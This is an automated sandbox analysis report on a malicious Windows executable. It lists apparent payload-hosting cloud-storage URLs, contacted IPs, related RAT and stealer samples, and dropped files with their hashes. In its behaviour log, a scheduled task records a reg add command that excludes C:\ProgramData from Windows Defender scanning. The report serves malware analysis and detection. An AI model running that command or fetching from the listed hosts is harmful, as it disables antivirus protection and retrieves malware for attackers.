https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg?	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=	svchost.exe, 00000002.00000003.1384651314.000002336DE32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	Gokod.763652.06.exe, J8daaU.exe.0.dr	false		high
https://dev.virtualearth.net/REST/v1/Routes/Driving	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx	svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	false		high
https://xh4ffp.oss-cn-beijing.aliyuncs.com/7-2476756634-1002	Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Gokod.763652.06.exe	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/.o	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sciencedirect.com/science/journal/01403664)/S/URI	Gokod.763652.06.exe	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/2	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Gokod.763652.06.exe	false		high
https://dev.ditu.live.com/mapcontrol/logging.ashx	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/om	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=	svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://downloads.hawe.com/3/7/D3726-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/ProdV2	edb.log.1.dr, qmgr.db.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	aceprocted.sys.0.dr	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpges	J8daaU.exe, 00000037.00000002.2414695513.000002B873614000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B873614000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/7	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/fo	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dl.google.com/release2/chrome/il4ofyksvfhyikxnl76bap4pmu_116.0.5845.111/116.0.5845.111_chrom	Gokod.763652.06.exe	false		high
https://downloads.hawe.com/7/7/D7710MV-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/Windows	J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/	svchost.exe, 00000002.00000002.1395559421.000002336DE2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1378896420.000002336DE67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395695861.000002336DE68000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/Windows	J8daaU.exe, 00000037.00000002.2414695513.000002B873577000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgu.aliyuncs.com/	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crossref.org/crossmark/1.0/	Gokod.763652.06.exe	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/.a(	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Gokod.763652.06.exe, J8daaU.exe.0.dr	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/e	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.ditu.live.com/REST/v1/Transit/Stops/	svchost.exe, 00000002.00000002.1395720938.000002336DE81000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.thawte.com0	aceprocted.sys.0.dr	false		high
https://dev.virtualearth.net/REST/v1/Traffic/Incidents/	svchost.exe, 00000002.00000002.1395585730.000002336DE3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=	svchost.exe, 00000002.00000003.1380560951.000002336DE4C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Gokod.763652.06.exe	false		high
https://xh4ffp.oss-cn-beijing.aliyuncs.com/	Gokod.763652.06.exe, 00000000.00000003.1318204727.0000000000598000.00000004.00000020.00020000.00000000.sdmp, Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?	svchost.exe, 00000002.00000002.1395600339.000002336DE44000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1379042251.000002336DE62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1380955813.000002336DE43000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1395682749.000002336DE63000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Gokod.763652.06.exe, Amcache.hve.54.dr	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/v	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://nm25.oss-cn-hangzhou.aliyuncs.com/al	J8daaU.exe, 00000037.00000002.2415398073.000002B87364B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://xh4ffp.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/7-2476756634-1002	Gokod.763652.06.exe, 00000000.00000003.1353431063.0000000000598000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dev.virtualearth.net/mapcontrol/logging.ashx	svchost.exe, 00000002.00000003.1380002266.000002336DE58000.00000004.00000020.00020000.00000000.sdmp	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	J8daaU.exe, 00000037.00000002.2413857794.000000EAE26FE000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2414695513.000002B8735D4000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26F6000.00000004.00000010.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2413857794.000000EAE26E8000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elsevier.com/locate/comcom)/S/URI	Gokod.763652.06.exe	false		high
https://nm25.oss-cn-hangzhou.aliyuncs.com/f.datjpgW_	J8daaU.exe, 00000037.00000002.2414695513.000002B8735E9000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000003.2400168479.000002B8735E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://downloads.hawe.com/5/4/B5488-de.pdf)	Gokod.763652.06.exe	false	Avira URL Cloud: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	Gokod.763652.06.exe, J8daaU.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
118.178.60.98	sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
39.103.20.59	sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1639725
Start date and time:	2025-03-16 05:19:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 44s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	56
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Gokod.763652.06.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@84/35@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): SIHClient.exe
Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.189.173.21, 172.202.163.200, 20.190.159.4
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:20:14	API Interceptor	4x Sleep call for process: Gokod.763652.06.exe modified
00:20:18	API Interceptor	2x Sleep call for process: svchost.exe modified
00:21:26	API Interceptor	1x Sleep call for process: MpCmdRun.exe modified
00:21:40	API Interceptor	1x Sleep call for process: WerFault.exe modified
00:22:11	API Interceptor	2x Sleep call for process: J8daaU.exe modified
04:20:50	Task Scheduler	Run new task: 04akq path: C:\Users\user\Documents\J8daaU.exe
04:21:13	Task Scheduler	Run new task: Task1 path: cmd.exe s>/c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.178.60.98	287263487-92873475.04.exe	Get hash	malicious	Unknown	Browse
118.178.60.98	176320045-328764975.06.exe	Get hash	malicious	Unknown	Browse
39.103.20.59	45631.exe	Get hash	malicious	Nitol	Browse
39.103.20.59	45631.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	45631.exe	Get hash	malicious	Nitol	Browse	39.103.20.59
sc-2cuv.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	45631.exe	Get hash	malicious	Unknown	Browse	39.103.20.59
sc-2pyl.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	287263487-92873475.04.exe	Get hash	malicious	Unknown	Browse	118.178.60.98
	176320045-328764975.06.exe	Get hash	malicious	Unknown	Browse	118.178.60.98

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	KKveTTgaAAsecNNaaaa.x86.elf	Get hash	malicious	Unknown	Browse	116.62.234.155
	KKveTTgaAAsecNNaaaa.arm.elf	Get hash	malicious	Unknown	Browse	8.158.99.172
	KKveTTgaAAsecNNaaaa.mpsl.elf	Get hash	malicious	Unknown	Browse	47.112.66.80
	KKveTTgaAAsecNNaaaa.mips.elf	Get hash	malicious	Unknown	Browse	39.101.25.51
	KKveTTgaAAsecNNaaaa.spc.elf	Get hash	malicious	Unknown	Browse	139.252.196.48
	KKveTTgaAAsecNNaaaa.x86_64.elf	Get hash	malicious	Unknown	Browse	121.43.15.175
	KKveTTgaAAsecNNaaaa.m68k.elf	Get hash	malicious	Unknown	Browse	139.243.169.18
	KKveTTgaAAsecNNaaaa.arm7.elf	Get hash	malicious	Mirai	Browse	101.133.181.30
	ppc.elf	Get hash	malicious	Mirai	Browse	8.138.223.37
	m68k.elf	Get hash	malicious	Mirai	Browse	8.182.118.98
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	KKveTTgaAAsecNNaaaa.x86.elf	Get hash	malicious	Unknown	Browse	116.62.234.155
	KKveTTgaAAsecNNaaaa.arm.elf	Get hash	malicious	Unknown	Browse	8.158.99.172
	KKveTTgaAAsecNNaaaa.mpsl.elf	Get hash	malicious	Unknown	Browse	47.112.66.80
	KKveTTgaAAsecNNaaaa.mips.elf	Get hash	malicious	Unknown	Browse	39.101.25.51
	KKveTTgaAAsecNNaaaa.spc.elf	Get hash	malicious	Unknown	Browse	139.252.196.48
	KKveTTgaAAsecNNaaaa.x86_64.elf	Get hash	malicious	Unknown	Browse	121.43.15.175
	KKveTTgaAAsecNNaaaa.m68k.elf	Get hash	malicious	Unknown	Browse	139.243.169.18
	KKveTTgaAAsecNNaaaa.arm7.elf	Get hash	malicious	Mirai	Browse	101.133.181.30
	ppc.elf	Get hash	malicious	Mirai	Browse	8.138.223.37
	m68k.elf	Get hash	malicious	Mirai	Browse	8.182.118.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.PWSX-gen.25337.28224.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.RATX-gen.20425.5895.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.PWSX-gen.10149.19935.exe	Get hash	malicious	Poverty Stealer	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Variant.Lazy.637385.16625.13964.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Trojan.Win64.Agent.30981.30321.exe	Get hash	malicious	Unknown	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.RATX-gen.28955.11907.exe	Get hash	malicious	XWorm	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.RATX-gen.23694.15705.exe	Get hash	malicious	XWorm	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.RATX-gen.1407.14828.exe	Get hash	malicious	SugarDump, XWorm	Browse	39.103.20.59 118.178.60.98
	SecuriteInfo.com.Win32.RATX-gen.3254.10881.exe	Get hash	malicious	LummaC Stealer	Browse	39.103.20.59 118.178.60.98

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\u0syUl\u0syUl.exe	287263487-92873475.04.exe	Get hash	malicious	Unknown	Browse
	1237458-28376475.12.exe	Get hash	malicious	GhostRat	Browse
	1726386475-238475987.12.exe	Get hash	malicious	GhostRat, Nitol	Browse
	176348758-8376475954.05.exe	Get hash	malicious	GhostRat	Browse
	2683487-23874698385.8.exe	Get hash	malicious	Unknown	Browse
	23749-28764875432.5.exe	Get hash	malicious	Unknown	Browse
	16526348-28746873649.6.exe	Get hash	malicious	Unknown	Browse
	26532748-873258734.03.exe	Get hash	malicious	Unknown	Browse
C:\Program Files (x86)\4xCNoe\4xCNoe.exe	287263487-92873475.04.exe	Get hash	malicious	Unknown	Browse
	1237458-28376475.12.exe	Get hash	malicious	GhostRat	Browse
	1726386475-238475987.12.exe	Get hash	malicious	GhostRat, Nitol	Browse
	176348758-8376475954.05.exe	Get hash	malicious	GhostRat	Browse
	2683487-23874698385.8.exe	Get hash	malicious	Unknown	Browse
	23749-28764875432.5.exe	Get hash	malicious	Unknown	Browse
	16526348-28746873649.6.exe	Get hash	malicious	Unknown	Browse
	26532748-873258734.03.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\4xCNoe\4xCNoe.exe

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	149320
Entropy (8bit):	6.132902701299525
Encrypted:	false
SSDEEP:	3072:VafgcZGuY2TqWLGzwRC7kll1xtBQDTCCvtzaYPFPR/M:Yz8upLGaPQDnFzaYPFdM
MD5:	5251B98614ACFFE5C856F4039CA03DA3
SHA1:	C80ED6716E89D4862F28EBBC130EC5AA362DB963
SHA-256:	6D6BA2BC9AD414837826F7278BC3E0116F1AEDA02D0C2284ED65819F5D9180A8
SHA-512:	D750C9ADB08D9525EE9948C0C18C96F0C9520068AA4AA24885AC0D98790A6CC0A8CE0E71E1C669ACD4623E0AABFC08C11C02BE403F275B01AA4277C4DDAB3302
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 287263487-92873475.04.exe, Detection: malicious, Browse Filename: 1237458-28376475.12.exe, Detection: malicious, Browse Filename: 1726386475-238475987.12.exe, Detection: malicious, Browse Filename: 176348758-8376475954.05.exe, Detection: malicious, Browse Filename: 2683487-23874698385.8.exe, Detection: malicious, Browse Filename: 23749-28764875432.5.exe, Detection: malicious, Browse Filename: 16526348-28746873649.6.exe, Detection: malicious, Browse Filename: 26532748-873258734.03.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wy..Wy..Wy......]y.......y......Cy......qy......Ey......Cy......Sy......Ty..Wy...y......Uy......Vy..Wy`.Vy......Vy..RichWy..................PE..L.....Ef...............'.....N....................@..........................P............@..................................=..P....p..................H=...@.......1..p............................0..@...............8............................text............................... ..`.rdata..Hd.......f..................@..@.data...T....P......................@....rsrc........p.......8..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\u0syUl\u0syUl.exe

Download File

Process:	C:\Users\user\Documents\J8daaU.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	149320
Entropy (8bit):	6.132902701299525
Encrypted:	false
SSDEEP:	3072:VafgcZGuY2TqWLGzwRC7kll1xtBQDTCCvtzaYPFPR/M:Yz8upLGaPQDnFzaYPFdM
MD5:	5251B98614ACFFE5C856F4039CA03DA3
SHA1:	C80ED6716E89D4862F28EBBC130EC5AA362DB963
SHA-256:	6D6BA2BC9AD414837826F7278BC3E0116F1AEDA02D0C2284ED65819F5D9180A8
SHA-512:	D750C9ADB08D9525EE9948C0C18C96F0C9520068AA4AA24885AC0D98790A6CC0A8CE0E71E1C669ACD4623E0AABFC08C11C02BE403F275B01AA4277C4DDAB3302
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 287263487-92873475.04.exe, Detection: malicious, Browse Filename: 1237458-28376475.12.exe, Detection: malicious, Browse Filename: 1726386475-238475987.12.exe, Detection: malicious, Browse Filename: 176348758-8376475954.05.exe, Detection: malicious, Browse Filename: 2683487-23874698385.8.exe, Detection: malicious, Browse Filename: 23749-28764875432.5.exe, Detection: malicious, Browse Filename: 16526348-28746873649.6.exe, Detection: malicious, Browse Filename: 26532748-873258734.03.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Wy..Wy..Wy......]y.......y......Cy......qy......Ey......Cy......Sy......Ty..Wy...y......Uy......Vy..Wy`.Vy......Vy..RichWy..................PE..L.....Ef...............'.....N....................@..........................P............@..................................=..P....p..................H=...@.......1..p............................0..@...............8............................text............................... ..`.rdata..Hd.......f..................@..@.data...T....P......................@....rsrc........p.......8..............@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.307357171321343
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrZ:KooCEYhgYEL0In
MD5:	E2BCAD2B15410ECB99741ED9D82B60DF
SHA1:	594A7E3C35662F834DFCFCECE8CF042B9F91DBFF
SHA-256:	A6E75FB543B162EF2928186172F607CE38619344F214F2A60670C5AAD08BEB56
SHA-512:	7CFE840F74E1B1D931D56E5D10480694A7AD33294A777427AF8342B5BE0C22A070C3FF08AC0BDD0608178AD4EEFD8BB365D510CF09BD5A92745B44A69098566E
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x524303ef, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42215769331122854
Encrypted:	false
SSDEEP:	1536:Qn2SB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1w:Baza/vMUM2Uvz7DO
MD5:	9EF5D266F59AEFC9D6DFAF71DD49C3D4
SHA1:	E84C0138A17A95564BACF713370E9EB888596134
SHA-256:	978A012E306E017FA850CE80986E4EA3BD8D7749B4C5598A4D282EC390D99609
SHA-512:	462BDA72C0C0C0B9A8AD6ABF8D77C5421E5832CA076F5D29BF06C307C811CB39ABDDEFC20888A9F08FA22271E3E90CC3A90D4BE2756555F04530238296BD8C98
Malicious:	false
Preview:	RC..... .......A.......X\...;...{......................0.!..........{A......}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...........................................}....................R.....}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07708477168125771
Encrypted:	false
SSDEEP:	3:4lllEYeAnsY70kjn13a/kIM//lollcVO/lnlZMxZNQl:46z4sm53qkIM/GOewk
MD5:	5B3F4830D396C7ECC8D57CFDFAA1C81C
SHA1:	71C0CA6115B2434AEADDBD729E93E52C987D8F40
SHA-256:	DE9C87A210C2F9393566968012017A3A2ACF32CC890D7847E35F770ED1D13604
SHA-512:	C67EE576069FD36F12C6996AEBEF6213E10F9CCCCD86824AE81D0727D792D2FBEB75A221582D6E99280D033D5426EFBE5C82B1725E762F443D929177D0D32C38
Malicious:	false
Preview:	..[P.....................................;...{.......}.......{A..............{A......{A..........{A]..................R.....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_J8daaU.exe_458531a1478468bf3235615eee0fe7f25ff468e_30a9a973_581b625e-1689-49c5-9b43-4786550ddc5d\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1038116412050012
Encrypted:	false
SSDEEP:	192:TWSdpAhVI/0I3DUjS/EerIzuiFAZ24lO8X:qSduhVIsI3DUjwIzuiFAY4lO8X
MD5:	C234555860F3DE652979ADAC564001DE
SHA1:	6DF101AB0714DC94EEE9F99DDEF44C8393AFAB89
SHA-256:	E08D0848E64561E7D108EA9634757C76A9768DA2B5113A5F4084D2B5B29B7A43
SHA-512:	E4BE0430EC8C96CFDAFA8FEF60169F8AE6CD98EBD37627B50C2C5DBAE5FC6922611334DB61E2599B21230720652290702650A6A824D1DCAA189FB81B8DB3F2CA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.5.7.2.4.9.7.6.3.8.2.2.9.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.5.7.2.4.9.8.1.3.8.2.2.4.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.8.1.b.6.2.5.e.-.1.6.8.9.-.4.9.c.5.-.9.b.4.3.-.4.7.8.6.5.5.0.d.d.c.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.c.2.c.4.3.1.9.-.2.1.5.7.-.4.e.7.f.-.9.f.3.2.-.5.2.5.9.5.1.9.a.4.7.4.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.J.8.d.a.a.U...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.a.n.a.g.e.R.e.a.d.e.r.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.3.8.-.0.0.0.1.-.0.0.1.8.-.d.1.f.d.-.0.f.d.3.2.a.9.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.8.0.0.d.0.e.1.d.1.0.a.9.8.3.0.4.d.e.b.9.6.0.b.9.b.8.3.2.b.3.6.0.0.0.0.0.9.0.4.!.0.0.0.0.4.4.f.2.1.9.e.c.f.f.f.2.7.b.f.8.1.d.c.c.e.e.0.7.6.5.8.3.d.3.2.c.e.5.b.f.8.2.b.d.!.J.8.d.a.a.U...e.x.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD5.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Mar 16 04:21:37 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	293520
Entropy (8bit):	1.1881204411258488
Encrypted:	false
SSDEEP:	384:pVaPab6860umxrNzyUkFgeZvxthEPLlByRR2ttuAdj:pVaiGE3RzyZFgeF1ETny3SuAdj
MD5:	ED9AFA826F696FC98D10B1029596A10F
SHA1:	19B2F50BF75D0B194CACFEE0A9A50F9ED81C3DAA
SHA-256:	EB26ACC35CD1A55FE7C8D0A342023293569007480626695C585794E9DB6A6F86
SHA-512:	5594717997B964AA01591E8629FD2955DAE1D3735722C530DAFE9E55AA20374D8E6EF08D0A2776747FE604BF027CB359E88DD0F095C1BBA5A7445FBD18D25539
Malicious:	false
Preview:	MDMP..a..... ........Q.g....................................................T.......8...........T............V...$...........'...........)..............................................................................eJ......X*......Lw......................T.......8....Q.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. 